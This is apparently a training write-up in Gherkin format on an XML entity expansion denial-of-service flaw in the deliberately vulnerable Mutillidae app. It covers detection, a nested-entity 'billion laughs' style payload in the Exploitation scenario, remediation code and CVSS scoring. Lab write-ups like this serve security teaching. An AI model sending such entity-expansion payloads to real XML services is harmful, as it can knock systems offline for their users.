## Version 1.4.1
## language: en

Feature:
  TOE:
    Mutillidae
  Category:
  Location:
    http://localhost/mutillidae/xml-validator.php
  CWE:
    CWE-770: Allocation of Resources Without Limits or Throttling
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Denial of service
  Recommendation:
    Disable entities, limit xml input size, limit number of entities

  Background:
  Hacker's software:
    | <Software name> | <Version>         |
    | Windows         | 10                |
    | Firefox         | 67.0.3            |
  TOE information:
    Given I am accessing the site "http://localhost/mutillidae"
    And it is built on php and mysql

  Scenario: Normal use case
    Given I access "/mutillidae/index.php?page=xml-validator.php"
    And a form for xml input
    When I supply the example xml
    """
    <somexml><message>Hello World</message></somexml>
    """
    Then I see
    """
    XML Submitted
    <somexml><message>Hello World</message></somexml>
    Text Content Parsed From XML
    Hello World
    """

  Scenario: Static detection
    When I look at the code "xml-validator.php"
    Then I can see an input filter on line 190
    """
    if(!($lEnableXMLValidation &&
    (preg_match(XML_EXTERNAL_ENTITY_REGEX_PATTERNS, $lXML)
    || !preg_match(VALID_XML_CHARACTERS, $lXML)))){
    """
    And this set of variable at lines 28, 38
    """
    $lEnableXMLValidation = FALSE;
    """
    And that is controlled by user input on line 23
    """
    switch ($_SESSION["security-level"]){
    """
    Then filter can be bypassed
    But with "lEnableXMLValidation" at false

  Scenario: Dynamic detection
    Given the form of xml input
    When I supply a test for entity availability
    """
    <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY a "hi entity">
    <!ENTITY b "&a;&a;"> ]>
    <root> &b; </root>
    """
    Then I receive
    """
    hi entityhi entity
    """
    Then XEE can be possible

  Scenario: Exploitation
    Given entities enabled
    When I put recursive references
    """
    <!ENTITY a "Hacked">
    <!ENTITY b "&a;&a;">
    <!ENTITY c "&b;&b;&b;">
    ...
    <!ENTITY k "&j;&j;&j;&j;&j;&j;&j;&j;&j;&j;&j;">
    """
    Then I get an error message
    And no DoS is done
    """
    quadratic expansion means repetitive entity
    references like &r;&r;&r;&r;...
    """
    But with quadratic expansion plus some recursion
    """
    <?xml version="1.0"?>
    <!DOCTYPE root [
    <!ENTITY a "Hackednsdoivndkfnsodkfndskodfffffdddddds
    fafdafshsfbsfrhdfgtjhtjfdyfdhjynfthrdgbdfbfvcnntncty
    hgfghggggggggggfhyjgyjghujtumihkjuhjoihfhifuygjnygjn">
    <!ENTITY b "&a;&a;&a;&a;">
    <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
    ...
    <!ENTITY j "&a;&a;&a;&a;">
    <!ENTITY k "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
    ]>
    <root>
    &c;&c;&c;&c;&e;&e;&e;&e;&g;&g;&g;&g;&i;&i;&i;&i;&h;&a;&c;&k;&e;&d;
    ... x89 lines
    &c;&c;&c;&c;&e;&e;&e;&e;&g;&g;&g;&g;&i;&i;&i;&i;&h;&a;&c;&k;&e;&d;
    <root>
    """
    Then DoS attack is succesful [evidence](dos.png)

  Scenario: Remediation
    Given that entities are the cause
    Then I force the system to always disable them
    And limit input size
    """
    line 190 changed to
    if(!(preg_match(XML_EXTERNAL_ENTITY_REGEX_PATTERNS, $lXML)
     || !preg_match(VALID_XML_CHARACTERS, $lXML)) && strlen($lXML)<10000){
    """
    When entities are needed
    Then limit number of entities
    """
    line 190 changed to
    if(!(preg_match(XML_EXTERNAL_ENTITY_REGEX_PATTERNS, $lXML)
     || !preg_match(VALID_XML_CHARACTERS, $lXML)) && strlen($lXML)<10000
     && limit_ent($lXML,100)){
    //-----limit_ent definition-----//
    function limit_ent($xml,$num){
      $re = preg_match_all("/\&\w+\;/",$xml,$q);
      if(sizeof($q[0])<$num){
        return true;
      }
      echo "Denied: too many entities. (act/max):".sizeof($q[0])."/".$num;
      return false;
    }
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (high) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.3/10 (high) - E:H/RL:W/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.6/10 (medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2019-07-04
